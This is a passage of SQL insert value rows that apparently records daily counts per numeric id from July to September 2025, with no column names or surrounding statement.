(1594,0,'20250706',3),
(1571,0,'20250706',5),
(14,0,'20250706',16),
(459,0,'20250707',1),
(563,0,'20250707',1),
(566,0,'20250707',1),
(609,0,'20250707',1),
(824,0,'20250707',1),
(828,0,'20250707',1),
(871,0,'20250707',1),
(1540,0,'20250707',1),
(1571,0,'20250707',1),
(1611,0,'20250707',1),
(1697,0,'20250707',1),
(476,0,'20250707',2),
(542,0,'20250707',2),
(546,0,'20250707',2),
(650,0,'20250707',2),
(1502,0,'20250707',2),
(1558,0,'20250707',2),
(362,0,'20250707',3),
(469,0,'20250707',3),
(605,0,'20250707',3),
(643,0,'20250707',3),
(1594,0,'20250707',3),
(1704,0,'20250707',3),
(355,0,'20250707',7),
(14,0,'20250707',28),
(542,0,'20250708',1),
(609,0,'20250708',1),
(650,0,'20250708',1),
(703,0,'20250708',1),
(708,0,'20250708',1),
(741,0,'20250708',1),
(771,0,'20250708',1),
(824,0,'20250708',1),
(1502,0,'20250708',1),
(1540,0,'20250708',1),
(355,0,'20250708',2),
(566,0,'20250708',2),
(831,0,'20250708',2),
(900,0,'20250708',2),
(1558,0,'20250708',2),
(1704,0,'20250708',2),
(362,0,'20250708',3),
(469,0,'20250708',3),
(546,0,'20250708',3),
(712,0,'20250708',3),
(784,0,'20250708',3),
(1571,0,'20250708',3),
(1594,0,'20250708',3),
(605,0,'20250708',4),
(828,0,'20250708',4),
(859,0,'20250708',4),
(1032,0,'20250708',4),
(459,0,'20250708',5),
(871,0,'20250708',5),
(1697,0,'20250708',5),
(1754,0,'20250708',5),
(476,0,'20250708',12),
(14,0,'20250708',51),
(496,0,'20250709',1),
(506,0,'20250709',1),
(546,0,'20250709',1),
(605,0,'20250709',1),
(656,0,'20250709',1),
(700,0,'20250709',1),
(708,0,'20250709',1),
(741,0,'20250709',1),
(810,0,'20250709',1),
(871,0,'20250709',1),
(1558,0,'20250709',1),
(1594,0,'20250709',1),
(1697,0,'20250709',1),
(362,0,'20250709',2),
(469,0,'20250709',2),
(609,0,'20250709',2),
(355,0,'20250709',4),
(14,0,'20250709',25),
(355,0,'20250710',1),
(362,0,'20250710',1),
(469,0,'20250710',1),
(476,0,'20250710',1),
(546,0,'20250710',1),
(563,0,'20250710',1),
(609,0,'20250710',1),
(643,0,'20250710',1),
(741,0,'20250710',1),
(748,0,'20250710',1),
(784,0,'20250710',1),
(840,0,'20250710',1),
(859,0,'20250710',1),
(871,0,'20250710',1),
(900,0,'20250710',1),
(1523,0,'20250710',1),
(1571,0,'20250710',1),
(1611,0,'20250710',1),
(1623,0,'20250710',1),
(1684,0,'20250710',1),
(1754,0,'20250710',1),
(712,0,'20250710',2),
(1020,0,'20250710',2),
(1697,0,'20250710',2),
(1704,0,'20250710',2),
(605,0,'20250710',3),
(459,0,'20250710',4),
(14,0,'20250710',12),
(355,0,'20250711',1),
(476,0,'20250711',1),
(506,0,'20250711',1),
(546,0,'20250711',1),
(605,0,'20250711',1),
(643,0,'20250711',1),
(656,0,'20250711',1),
(680,0,'20250711',1),
(810,0,'20250711',1),
(831,0,'20250711',1),
(871,0,'20250711',1),
(1003,0,'20250711',1),
(1010,0,'20250711',1),
(1032,0,'20250711',1),
(1523,0,'20250711',1),
(1594,0,'20250711',1),
(1611,0,'20250711',1),
(1684,0,'20250711',1),
(1754,0,'20250711',1),
(496,0,'20250711',2),
(566,0,'20250711',2),
(708,0,'20250711',2),
(712,0,'20250711',2),
(900,0,'20250711',2),
(1540,0,'20250711',2),
(484,0,'20250711',4),
(650,0,'20250711',5),
(840,0,'20250711',5),
(716,0,'20250711',6),
(14,0,'20250711',9),
(459,0,'20250712',1),
(476,0,'20250712',1),
(566,0,'20250712',1),
(643,0,'20250712',1),
(656,0,'20250712',1),
(712,0,'20250712',1),
(716,0,'20250712',1),
(748,0,'20250712',1),
(1502,0,'20250712',1),
(1558,0,'20250712',1),
(1611,0,'20250712',1),
(1697,0,'20250712',1),
(1754,0,'20250712',1),
(469,0,'20250712',2),
(741,0,'20250712',2),
(1010,0,'20250712',2),
(1523,0,'20250712',2),
(1623,0,'20250712',2),
(650,0,'20250712',3),
(871,0,'20250712',3),
(14,0,'20250712',16),
(362,0,'20250713',1),
(469,0,'20250713',1),
(476,0,'20250713',1),
(650,0,'20250713',1),
(748,0,'20250713',1),
(780,0,'20250713',1),
(1003,0,'20250713',1),
(1540,0,'20250713',1),
(1571,0,'20250713',1),
(1611,0,'20250713',1),
(1684,0,'20250713',1),
(1704,0,'20250713',1),
(563,0,'20250713',2),
(680,0,'20250713',2),
(855,0,'20250713',2),
(14,0,'20250713',20),
(459,0,'20250714',1),
(469,0,'20250714',1),
(546,0,'20250714',1),
(609,0,'20250714',1),
(650,0,'20250714',1),
(680,0,'20250714',1),
(703,0,'20250714',1),
(708,0,'20250714',1),
(712,0,'20250714',1),
(771,0,'20250714',1),
(780,0,'20250714',1),
(784,0,'20250714',1),
(824,0,'20250714',1),
(828,0,'20250714',1),
(831,0,'20250714',1),
(836,0,'20250714',1),
(840,0,'20250714',1),
(851,0,'20250714',1),
(855,0,'20250714',1),
(900,0,'20250714',1),
(1003,0,'20250714',1),
(1010,0,'20250714',1),
(1020,0,'20250714',1),
(1032,0,'20250714',1),
(1052,0,'20250714',1),
(1502,0,'20250714',1),
(1523,0,'20250714',1),
(1540,0,'20250714',1),
(1571,0,'20250714',1),
(1611,0,'20250714',1),
(1684,0,'20250714',1),
(1704,0,'20250714',1),
(1754,0,'20250714',1),
(476,0,'20250714',2),
(506,0,'20250714',2),
(566,0,'20250714',2),
(605,0,'20250714',2),
(776,0,'20250714',2),
(859,0,'20250714',2),
(1036,0,'20250714',2),
(1059,0,'20250714',2),
(1558,0,'20250714',2),
(1594,0,'20250714',2),
(1623,0,'20250714',2),
(1697,0,'20250714',2),
(355,0,'20250714',3),
(643,0,'20250714',3),
(362,0,'20250714',4),
(871,0,'20250714',4),
(14,0,'20250714',11),
(459,0,'20250715',1),
(476,0,'20250715',1),
(506,0,'20250715',1),
(546,0,'20250715',1),
(563,0,'20250715',1),
(566,0,'20250715',1),
(700,0,'20250715',1),
(1016,0,'20250715',1),
(1032,0,'20250715',1),
(1036,0,'20250715',1),
(1059,0,'20250715',1),
(1502,0,'20250715',1),
(1523,0,'20250715',1),
(1558,0,'20250715',1),
(1594,0,'20250715',1),
(1623,0,'20250715',1),
(1684,0,'20250715',1),
(776,0,'20250715',2),
(1697,0,'20250715',2),
(1704,0,'20250715',2),
(1754,0,'20250715',2),
(1571,0,'20250715',3),
(871,0,'20250715',5),
(14,0,'20250715',236),
(459,0,'20250716',1),
(476,0,'20250716',1),
(484,0,'20250716',1),
(563,0,'20250716',1),
(605,0,'20250716',1),
(643,0,'20250716',1),
(871,0,'20250716',1),
(1016,0,'20250716',1),
(1523,0,'20250716',1),
(1611,0,'20250716',1),
(1754,0,'20250716',1),
(703,0,'20250716',2),
(355,0,'20250716',10),
(14,0,'20250716',22),
(484,0,'20250717',1),
(546,0,'20250717',1),
(643,0,'20250717',1),
(771,0,'20250717',1),
(784,0,'20250717',1),
(859,0,'20250717',1),
(1003,0,'20250717',1),
(1010,0,'20250717',1),
(1016,0,'20250717',1),
(1502,0,'20250717',1),
(1558,0,'20250717',1),
(362,0,'20250717',2),
(476,0,'20250717',2),
(609,0,'20250717',2),
(605,0,'20250717',3),
(871,0,'20250717',4),
(355,0,'20250717',10),
(14,0,'20250717',18),
(496,0,'20250718',1),
(609,0,'20250718',1),
(700,0,'20250718',1),
(712,0,'20250718',1),
(831,0,'20250718',1),
(840,0,'20250718',1),
(1502,0,'20250718',1),
(355,0,'20250718',5),
(14,0,'20250718',15),
(459,0,'20250719',1),
(484,0,'20250719',1),
(546,0,'20250719',1),
(566,0,'20250719',1),
(650,0,'20250719',1),
(716,0,'20250719',1),
(824,0,'20250719',1),
(828,0,'20250719',1),
(900,0,'20250719',1),
(1754,0,'20250719',1),
(609,0,'20250719',2),
(355,0,'20250719',8),
(14,0,'20250719',19),
(484,0,'20250720',1),
(546,0,'20250720',1),
(643,0,'20250720',1),
(810,0,'20250720',1),
(824,0,'20250720',1),
(900,0,'20250720',1),
(1052,0,'20250720',1),
(14,0,'20250720',12),
(542,0,'20250721',1),
(609,0,'20250721',1),
(643,0,'20250721',1),
(712,0,'20250721',1),
(776,0,'20250721',1),
(784,0,'20250721',1),
(851,0,'20250721',1),
(859,0,'20250721',1),
(1523,0,'20250721',1),
(1540,0,'20250721',1),
(1684,0,'20250721',1),
(871,0,'20250721',2),
(1611,0,'20250721',2),
(14,0,'20250721',19),
(362,0,'20250722',1),
(484,0,'20250722',1),
(563,0,'20250722',1),
(605,0,'20250722',1),
(609,0,'20250722',1),
(643,0,'20250722',1),
(656,0,'20250722',1),
(700,0,'20250722',1),
(855,0,'20250722',1),
(871,0,'20250722',1),
(1558,0,'20250722',1),
(355,0,'20250722',3),
(14,0,'20250722',19),
(362,0,'20250723',1),
(476,0,'20250723',1),
(484,0,'20250723',1),
(563,0,'20250723',1),
(566,0,'20250723',1),
(605,0,'20250723',1),
(712,0,'20250723',1),
(859,0,'20250723',1),
(1502,0,'20250723',1),
(1540,0,'20250723',1),
(1571,0,'20250723',1),
(1594,0,'20250723',1),
(1623,0,'20250723',1),
(1684,0,'20250723',1),
(1697,0,'20250723',1),
(1704,0,'20250723',1),
(1754,0,'20250723',1),
(1036,0,'20250723',2),
(1523,0,'20250723',2),
(469,0,'20250723',3),
(355,0,'20250723',6),
(14,0,'20250723',17),
(362,0,'20250724',1),
(1003,0,'20250724',1),
(1032,0,'20250724',1),
(1571,0,'20250724',1),
(1594,0,'20250724',1),
(1684,0,'20250724',1),
(1704,0,'20250724',1),
(871,0,'20250724',2),
(1558,0,'20250724',2),
(1697,0,'20250724',2),
(355,0,'20250724',4),
(14,0,'20250724',14),
(741,0,'20250725',1),
(836,0,'20250725',1),
(900,0,'20250725',1),
(1540,0,'20250725',1),
(1611,0,'20250725',1),
(605,0,'20250725',2),
(355,0,'20250725',5),
(14,0,'20250725',13),
(542,0,'20250726',1),
(643,0,'20250726',1),
(656,0,'20250726',1),
(712,0,'20250726',1),
(716,0,'20250726',1),
(748,0,'20250726',1),
(810,0,'20250726',1),
(828,0,'20250726',1),
(1020,0,'20250726',1),
(1032,0,'20250726',1),
(1059,0,'20250726',1),
(1502,0,'20250726',1),
(1558,0,'20250726',1),
(14,0,'20250726',13),
(1010,0,'20250727',1),
(1594,0,'20250727',1),
(362,0,'20250727',2),
(14,0,'20250727',8),
(355,0,'20250728',1),
(459,0,'20250728',1),
(476,0,'20250728',1),
(496,0,'20250728',1),
(643,0,'20250728',1),
(703,0,'20250728',1),
(708,0,'20250728',1),
(712,0,'20250728',1),
(771,0,'20250728',1),
(828,0,'20250728',1),
(1523,0,'20250728',1),
(1684,0,'20250728',1),
(362,0,'20250728',2),
(14,0,'20250728',15),
(355,0,'20250729',1),
(362,0,'20250729',1),
(459,0,'20250729',1),
(506,0,'20250729',1),
(656,0,'20250729',1),
(700,0,'20250729',1),
(708,0,'20250729',1),
(900,0,'20250729',1),
(1571,0,'20250729',1),
(14,0,'20250729',11),
(469,0,'20250730',1),
(496,0,'20250730',1),
(546,0,'20250730',1),
(810,0,'20250730',1),
(840,0,'20250730',1),
(1059,0,'20250730',1),
(1540,0,'20250730',1),
(1611,0,'20250730',1),
(1623,0,'20250730',1),
(1697,0,'20250730',1),
(14,0,'20250730',4),
(650,0,'20250731',1),
(680,0,'20250731',1),
(741,0,'20250731',1),
(1523,0,'20250731',1),
(1594,0,'20250731',1),
(1754,0,'20250731',1),
(1571,0,'20250731',2),
(1684,0,'20250731',2),
(362,0,'20250731',5),
(14,0,'20250731',11),
(469,0,'20250801',1),
(546,0,'20250801',1),
(566,0,'20250801',1),
(650,0,'20250801',1),
(712,0,'20250801',1),
(741,0,'20250801',1),
(784,0,'20250801',1),
(1684,0,'20250801',1),
(476,0,'20250801',2),
(1540,0,'20250801',2),
(1697,0,'20250801',2),
(1704,0,'20250801',2),
(1754,0,'20250801',2),
(355,0,'20250801',6),
(14,0,'20250801',20),
(716,0,'20250802',1),
(748,0,'20250802',1),
(1611,0,'20250802',1),
(1697,0,'20250802',1),
(14,0,'20250802',3),
(355,0,'20250803',1),
(469,0,'20250803',1),
(476,0,'20250803',1),
(546,0,'20250803',1),
(810,0,'20250803',1),
(859,0,'20250803',1),
(1032,0,'20250803',1),
(1540,0,'20250803',1),
(1704,0,'20250803',1),
(1754,0,'20250803',1),
(650,0,'20250803',2),
(14,0,'20250803',6),
(496,0,'20250804',1),
(546,0,'20250804',1),
(605,0,'20250804',1),
(609,0,'20250804',1),
(650,0,'20250804',1),
(700,0,'20250804',1),
(855,0,'20250804',1),
(871,0,'20250804',1),
(1003,0,'20250804',1),
(1502,0,'20250804',1),
(1540,0,'20250804',1),
(1558,0,'20250804',1),
(1611,0,'20250804',1),
(1684,0,'20250804',1),
(1704,0,'20250804',1),
(656,0,'20250804',2),
(741,0,'20250804',2),
(810,0,'20250804',2),
(1523,0,'20250804',2),
(1571,0,'20250804',2),
(1594,0,'20250804',2),
(1623,0,'20250804',2),
(14,0,'20250804',9),
(355,0,'20250805',1),
(362,0,'20250805',1),
(459,0,'20250805',1),
(469,0,'20250805',1),
(476,0,'20250805',1),
(506,0,'20250805',1),
(542,0,'20250805',1),
(546,0,'20250805',1),
(563,0,'20250805',1),
(609,0,'20250805',1),
(643,0,'20250805',1),
(650,0,'20250805',1),
(680,0,'20250805',1),
(700,0,'20250805',1),
(703,0,'20250805',1),
(708,0,'20250805',1),
(712,0,'20250805',1),
(716,0,'20250805',1),
(741,0,'20250805',1),
(748,0,'20250805',1),
(771,0,'20250805',1),
(776,0,'20250805',1),
(780,0,'20250805',1),
(784,0,'20250805',1),
(828,0,'20250805',1),
(831,0,'20250805',1),
(836,0,'20250805',1),
(840,0,'20250805',1),
(851,0,'20250805',1),
(855,0,'20250805',1),
(900,0,'20250805',1),
(1003,0,'20250805',1),
(1010,0,'20250805',1),
(1016,0,'20250805',1),
(1020,0,'20250805',1),
(1032,0,'20250805',1),
(1036,0,'20250805',1),
(1059,0,'20250805',1),
(1684,0,'20250805',1),
(496,0,'20250805',2),
(566,0,'20250805',2),
(605,0,'20250805',2),
(656,0,'20250805',2),
(810,0,'20250805',2),
(824,0,'20250805',2),
(859,0,'20250805',2),
(1052,0,'20250805',2),
(1540,0,'20250805',2),
(1594,0,'20250805',2),
(1697,0,'20250805',2),
(1704,0,'20250805',2),
(1754,0,'20250805',2),
(871,0,'20250805',3),
(1571,0,'20250805',3),
(14,0,'20250805',4),
(459,0,'20250806',1),
(469,0,'20250806',1),
(476,0,'20250806',1),
(506,0,'20250806',1),
(566,0,'20250806',1),
(605,0,'20250806',1),
(650,0,'20250806',1),
(680,0,'20250806',1),
(703,0,'20250806',1),
(708,0,'20250806',1),
(712,0,'20250806',1),
(741,0,'20250806',1),
(771,0,'20250806',1),
(776,0,'20250806',1),
(780,0,'20250806',1),
(784,0,'20250806',1),
(824,0,'20250806',1),
(828,0,'20250806',1),
(831,0,'20250806',1),
(836,0,'20250806',1),
(840,0,'20250806',1),
(851,0,'20250806',1),
(855,0,'20250806',1),
(1016,0,'20250806',1),
(1020,0,'20250806',1),
(1032,0,'20250806',1),
(1036,0,'20250806',1),
(1052,0,'20250806',1),
(1059,0,'20250806',1),
(1523,0,'20250806',1),
(1540,0,'20250806',1),
(1571,0,'20250806',1),
(1594,0,'20250806',1),
(1697,0,'20250806',1),
(1704,0,'20250806',1),
(1754,0,'20250806',1),
(362,0,'20250806',2),
(546,0,'20250806',2),
(609,0,'20250806',2),
(643,0,'20250806',2),
(859,0,'20250806',2),
(871,0,'20250806',2),
(900,0,'20250806',2),
(1010,0,'20250806',2),
(355,0,'20250806',3),
(1003,0,'20250806',3),
(1915,0,'20250806',6),
(14,0,'20250806',45),
(469,0,'20250807',1),
(476,0,'20250807',1),
(563,0,'20250807',1),
(712,0,'20250807',1),
(741,0,'20250807',1),
(810,0,'20250807',1),
(831,0,'20250807',1),
(859,0,'20250807',1),
(900,0,'20250807',1),
(1003,0,'20250807',1),
(1016,0,'20250807',1),
(1502,0,'20250807',1),
(1540,0,'20250807',1),
(1558,0,'20250807',1),
(1594,0,'20250807',1),
(1697,0,'20250807',1),
(1704,0,'20250807',1),
(1915,0,'20250807',1),
(496,0,'20250807',2),
(609,0,'20250807',2),
(1032,0,'20250807',2),
(1623,0,'20250807',2),
(14,0,'20250807',10),
(476,0,'20250808',1),
(506,0,'20250808',1),
(546,0,'20250808',1),
(563,0,'20250808',1),
(605,0,'20250808',1),
(643,0,'20250808',1),
(656,0,'20250808',1),
(741,0,'20250808',1),
(748,0,'20250808',1),
(810,0,'20250808',1),
(828,0,'20250808',1),
(871,0,'20250808',1),
(900,0,'20250808',1),
(1032,0,'20250808',1),
(1502,0,'20250808',1),
(1594,0,'20250808',1),
(1623,0,'20250808',1),
(496,0,'20250808',2),
(712,0,'20250808',2),
(859,0,'20250808',2),
(1915,0,'20250808',2),
(14,0,'20250808',49),
(459,0,'20250809',1),
(469,0,'20250809',1),
(506,0,'20250809',1),
(563,0,'20250809',1),
(643,0,'20250809',1),
(656,0,'20250809',1),
(703,0,'20250809',1),
(824,0,'20250809',1),
(871,0,'20250809',1),
(1003,0,'20250809',1),
(1032,0,'20250809',1),
(1052,0,'20250809',1),
(1571,0,'20250809',1),
(1611,0,'20250809',1),
(1697,0,'20250809',1),
(1754,0,'20250809',1),
(1623,0,'20250809',2),
(355,0,'20250809',3),
(741,0,'20250809',3),
(810,0,'20250809',3),
(900,0,'20250809',3),
(14,0,'20250809',11),
(476,0,'20250810',1),
(484,0,'20250810',1),
(542,0,'20250810',1),
(546,0,'20250810',1),
(643,0,'20250810',1),
(650,0,'20250810',1),
(748,0,'20250810',1),
(776,0,'20250810',1),
(828,0,'20250810',1),
(851,0,'20250810',1),
(871,0,'20250810',1),
(900,0,'20250810',1),
(1003,0,'20250810',1),
(1010,0,'20250810',1),
(1032,0,'20250810',1),
(1502,0,'20250810',1),
(1558,0,'20250810',1),
(1594,0,'20250810',1),
(1611,0,'20250810',1),
(1754,0,'20250810',1),
(712,0,'20250810',2),
(859,0,'20250810',2),
(1523,0,'20250810',2),
(566,0,'20250810',3),
(1697,0,'20250810',3),
(14,0,'20250810',33),
(355,0,'20250811',1),
(496,0,'20250811',1),
(506,0,'20250811',1),
(563,0,'20250811',1),
(566,0,'20250811',1),
(643,0,'20250811',1),
(712,0,'20250811',1),
(780,0,'20250811',1),
(784,0,'20250811',1),
(1010,0,'20250811',1),
(1502,0,'20250811',1),
(1558,0,'20250811',1),
(1594,0,'20250811',1),
(1697,0,'20250811',1),
(362,0,'20250811',2),
(859,0,'20250811',2),
(1915,0,'20250811',2),
(14,0,'20250811',18),
(355,0,'20250812',1),
(362,0,'20250812',1),
(605,0,'20250812',1),
(643,0,'20250812',1),
(784,0,'20250812',1),
(855,0,'20250812',1),
(871,0,'20250812',1),
(900,0,'20250812',1),
(1003,0,'20250812',1),
(1032,0,'20250812',1),
(1036,0,'20250812',1),
(1523,0,'20250812',1),
(1558,0,'20250812',1),
(1611,0,'20250812',1),
(1704,0,'20250812',1),
(1915,0,'20250812',1),
(469,0,'20250812',2),
(14,0,'20250812',12),
(546,0,'20250813',1),
(563,0,'20250813',1),
(605,0,'20250813',1),
(609,0,'20250813',1),
(700,0,'20250813',1),
(741,0,'20250813',1),
(810,0,'20250813',1),
(855,0,'20250813',1),
(859,0,'20250813',1),
(900,0,'20250813',1),
(1003,0,'20250813',1),
(1032,0,'20250813',1),
(1523,0,'20250813',1),
(1540,0,'20250813',1),
(1571,0,'20250813',1),
(1704,0,'20250813',1),
(355,0,'20250813',2),
(469,0,'20250813',2),
(476,0,'20250813',2),
(496,0,'20250813',2),
(712,0,'20250813',2),
(871,0,'20250813',2),
(1594,0,'20250813',2),
(1611,0,'20250813',2),
(1684,0,'20250813',2),
(1623,0,'20250813',3),
(1697,0,'20250813',3),
(1915,0,'20250813',3),
(1754,0,'20250813',5),
(14,0,'20250813',20),
(355,0,'20250814',1),
(542,0,'20250814',1),
(546,0,'20250814',1),
(650,0,'20250814',1),
(656,0,'20250814',1),
(680,0,'20250814',1),
(708,0,'20250814',1),
(712,0,'20250814',1),
(716,0,'20250814',1),
(776,0,'20250814',1),
(780,0,'20250814',1),
(810,0,'20250814',1),
(824,0,'20250814',1),
(831,0,'20250814',1),
(1016,0,'20250814',1),
(1020,0,'20250814',1),
(1036,0,'20250814',1),
(1052,0,'20250814',1),
(1611,0,'20250814',1),
(1623,0,'20250814',1),
(1697,0,'20250814',1),
(469,0,'20250814',2),
(836,0,'20250814',2),
(1523,0,'20250814',2),
(1540,0,'20250814',2),
(1684,0,'20250814',2),
(609,0,'20250814',3),
(643,0,'20250814',3),
(1558,0,'20250814',3),
(871,0,'20250814',4),
(1502,0,'20250814',4),
(1915,0,'20250814',6),
(14,0,'20250814',34),
(566,0,'20250815',1),
(643,0,'20250815',1),
(840,0,'20250815',1),
(900,0,'20250815',1),
(1003,0,'20250815',1),
(1594,0,'20250815',1),
(1684,0,'20250815',1),
(1697,0,'20250815',1),
(1754,0,'20250815',1),
(362,0,'20250815',2),
(871,0,'20250815',2),
(1020,0,'20250815',2),
(14,0,'20250815',8),
(1915,0,'20250815',19),
(14,0,'20250822',1),
(14,0,'20250823',1),
(355,0,'20250827',1),
(469,0,'20250827',1),
(496,0,'20250827',1),
(609,0,'20250827',1),
(680,0,'20250827',1),
(748,0,'20250827',1),
(831,0,'20250827',1),
(871,0,'20250827',1),
(1003,0,'20250827',1),
(1016,0,'20250827',1),
(1020,0,'20250827',1),
(1684,0,'20250827',1),
(1915,0,'20250827',5),
(14,0,'20250827',15),
(496,0,'20250828',1),
(506,0,'20250828',1),
(542,0,'20250828',1),
(656,0,'20250828',1),
(700,0,'20250828',1),
(703,0,'20250828',1),
(708,0,'20250828',1),
(716,0,'20250828',1),
(741,0,'20250828',1),
(748,0,'20250828',1),
(771,0,'20250828',1),
(828,0,'20250828',1),
(1016,0,'20250828',1),
(1036,0,'20250828',1),
(1059,0,'20250828',1),
(1502,0,'20250828',1),
(1611,0,'20250828',1),
(1704,0,'20250828',1),
(1754,0,'20250828',1),
(1915,0,'20250828',2),
(14,0,'20250828',5),
(355,0,'20250829',1),
(362,0,'20250829',1),
(459,0,'20250829',1),
(546,0,'20250829',1),
(605,0,'20250829',1),
(680,0,'20250829',1),
(810,0,'20250829',1),
(828,0,'20250829',1),
(840,0,'20250829',1),
(851,0,'20250829',1),
(871,0,'20250829',1),
(900,0,'20250829',1),
(1003,0,'20250829',1),
(1010,0,'20250829',1),
(1052,0,'20250829',1),
(1523,0,'20250829',1),
(1540,0,'20250829',1),
(1571,0,'20250829',1),
(1623,0,'20250829',1),
(1697,0,'20250829',1),
(1704,0,'20250829',1),
(1754,0,'20250829',1),
(563,0,'20250829',2),
(1915,0,'20250829',3),
(14,0,'20250829',8),
(484,0,'20250830',1),
(546,0,'20250830',1),
(566,0,'20250830',1),
(609,0,'20250830',1),
(680,0,'20250830',1),
(776,0,'20250830',1),
(810,0,'20250830',1),
(824,0,'20250830',1),
(831,0,'20250830',1),
(836,0,'20250830',1),
(851,0,'20250830',1),
(859,0,'20250830',1),
(1594,0,'20250830',1),
(1623,0,'20250830',1),
(1684,0,'20250830',1),
(1915,0,'20250830',1),
(14,0,'20250830',8),
(469,0,'20250831',1),
(542,0,'20250831',1),
(563,0,'20250831',1),
(650,0,'20250831',1),
(712,0,'20250831',1),
(776,0,'20250831',1),
(780,0,'20250831',1),
(784,0,'20250831',1),
(1523,0,'20250831',1),
(1571,0,'20250831',1),
(1594,0,'20250831',1),
(1623,0,'20250831',1),
(1032,0,'20250831',2),
(355,0,'20250831',3),
(14,0,'20250831',14),
(362,0,'20250901',1),
(605,0,'20250901',1),
(741,0,'20250901',1),
(836,0,'20250901',1),
(855,0,'20250901',1),
(1036,0,'20250901',1),
(355,0,'20250901',3),
(14,0,'20250901',16),
(469,0,'20250902',1),
(643,0,'20250902',1),
(748,0,'20250902',1),
(1020,0,'20250902',1),
(355,0,'20250902',2),
(1915,0,'20250902',2),
(14,0,'20250902',17),
(484,0,'20250903',1),
(496,0,'20250903',1),
(542,0,'20250903',1),
(566,0,'20250903',1),
(609,0,'20250903',1),
(643,0,'20250903',1),
(703,0,'20250903',1),
(716,0,'20250903',1),
(748,0,'20250903',1),
(784,0,'20250903',1),
(836,0,'20250903',1),
(859,0,'20250903',1),
(1003,0,'20250903',1),
(1010,0,'20250903',1),
(1016,0,'20250903',1),
(1036,0,'20250903',1),
(1059,0,'20250903',1),
(1540,0,'20250903',1),
(476,0,'20250903',2),
(605,0,'20250903',2),
(1032,0,'20250903',2),
(1915,0,'20250903',2),
(459,0,'20250903',3),
(355,0,'20250903',4),
(14,0,'20250903',18),
(459,0,'20250906',1),
(469,0,'20250906',1),
(476,0,'20250906',1),
(496,0,'20250906',1),
(546,0,'20250906',1),
(605,0,'20250906',1),
(650,0,'20250906',1),
(656,0,'20250906',1),
(712,0,'20250906',1),
(741,0,'20250906',1),
(784,0,'20250906',1),
(859,0,'20250906',1),
(900,0,'20250906',1),
(1003,0,'20250906',1),
(1540,0,'20250906',1),
(1571,0,'20250906',1),
(1611,0,'20250906',1),
(1623,0,'20250906',1),
(1697,0,'20250906',1),
(1704,0,'20250906',1),
(1754,0,'20250906',1),
(362,0,'20250906',2),
(609,0,'20250906',2),
(643,0,'20250906',2),
(355,0,'20250906',4),
(14,0,'20250906',28),
(355,0,'20250907',1),
(469,0,'20250907',1),
(484,0,'20250907',1),
(609,0,'20250907',1),
(771,0,'20250907',1),
(1020,0,'20250907',1),
(1594,0,'20250907',1),
(1754,0,'20250907',1),
(1915,0,'20250907',1),
(506,0,'20250907',2),
(14,0,'20250907',31),
(459,0,'20250908',1),
(546,0,'20250908',1),
(656,0,'20250908',1),
(708,0,'20250908',1),
(784,0,'20250908',1),
(840,0,'20250908',1),
(1558,0,'20250908',1),
(1697,0,'20250908',1),
(14,0,'20250908',67),
(355,0,'20250909',1),
(362,0,'20250909',1),
(469,0,'20250909',1),
(563,0,'20250909',1),
(643,0,'20250909',1),
(650,0,'20250909',1),
(871,0,'20250909',1),
(1558,0,'20250909',1),
(1594,0,'20250909',1),
(1704,0,'20250909',2),
(1915,0,'20250909',2),
(14,0,'20250909',27),
(680,0,'20250910',1),
(1502,0,'20250910',1),
(1594,0,'20250910',1),
(1623,0,'20250910',1),
(1571,0,'20250910',2),
(14,0,'20250910',29),
(563,0,'20250911',1),
(566,0,'20250911',1),
(741,0,'20250911',1),
(748,0,'20250911',1),
(810,0,'20250911',1),
(836,0,'20250911',1),
(1010,0,'20250911',1),
(1032,0,'20250911',1),
(1571,0,'20250911',1),
(1594,0,'20250911',1),
(1684,0,'20250911',1),
(650,0,'20250911',2),
(1523,0,'20250911',2),
(1915,0,'20250911',2),
(14,0,'20250911',34),
(643,0,'20250912',1),
(700,0,'20250912',1),
(831,0,'20250912',1),
(855,0,'20250912',1),
(1010,0,'20250912',1),
(1020,0,'20250912',1),
(1502,0,'20250912',1),
(1558,0,'20250912',1),
(1611,0,'20250912',1),
(1915,0,'20250912',1),
(355,0,'20250912',2),
(14,0,'20250912',14),
(703,0,'20250913',1),
(716,0,'20250913',1),
(776,0,'20250913',1),
(1059,0,'20250913',1),
(1915,0,'20250913',1),
(469,0,'20250913',2),
(496,0,'20250913',2),
(546,0,'20250913',2),
(566,0,'20250913',2),
(609,0,'20250913',2),
(650,0,'20250913',2),
(656,0,'20250913',2),
(712,0,'20250913',2),
(784,0,'20250913',2),
(810,0,'20250913',2),
(1003,0,'20250913',2),
(1036,0,'20250913',2),
(1523,0,'20250913',2),
(1540,0,'20250913',2),
(1571,0,'20250913',2),
(1594,0,'20250913',2),
(1611,0,'20250913',2),
(1623,0,'20250913',2),
(1684,0,'20250913',2),
(1697,0,'20250913',2),
(1704,0,'20250913',2),
(1754,0,'20250913',2),
(355,0,'20250913',3),
(459,0,'20250913',3),
(476,0,'20250913',3),
(563,0,'20250913',3),
(741,0,'20250913',3),
(748,0,'20250913',3),
(859,0,'20250913',3),
(900,0,'20250913',3),
(1032,0,'20250913',3),
(14,0,'20250913',21),
(355,0,'20250914',1),
(484,0,'20250914',1),
(542,0,'20250914',1),
(708,0,'20250914',1),
(810,0,'20250914',1),
(871,0,'20250914',1),
(1540,0,'20250914',1),
(1571,0,'20250914',1),
(1704,0,'20250914',1),
(469,0,'20250914',2),
(741,0,'20250914',2),
(1032,0,'20250914',2),
(1754,0,'20250914',2),
(1915,0,'20250914',5),
(14,0,'20250914',20),
(355,0,'20250915',1),
(459,0,'20250915',1),
(476,0,'20250915',1),
(496,0,'20250915',1),
(546,0,'20250915',1),
(566,0,'20250915',1),
(609,0,'20250915',1),
(650,0,'20250915',1),
(656,0,'20250915',1),
(712,0,'20250915',1),
(741,0,'20250915',1),
(748,0,'20250915',1),
(784,0,'20250915',1),
(836,0,'20250915',1),
(859,0,'20250915',1),
(871,0,'20250915',1),
(900,0,'20250915',1),
(1003,0,'20250915',1),
(1032,0,'20250915',1),
(1523,0,'20250915',1),
(1594,0,'20250915',1),
(1623,0,'20250915',1),
(1684,0,'20250915',1),
(1697,0,'20250915',1),
(1704,0,'20250915',1),
(1754,0,'20250915',1),
(362,0,'20250915',2),
(563,0,'20250915',2),
(605,0,'20250915',2),
(810,0,'20250915',2),
(1540,0,'20250915',2),
(1571,0,'20250915',2),
(1611,0,'20250915',2),
(469,0,'20250915',4),
(14,0,'20250915',11),
(459,0,'20250916',1),
(496,0,'20250916',1),
(566,0,'20250916',1),
(609,0,'20250916',1),
(643,0,'20250916',1),
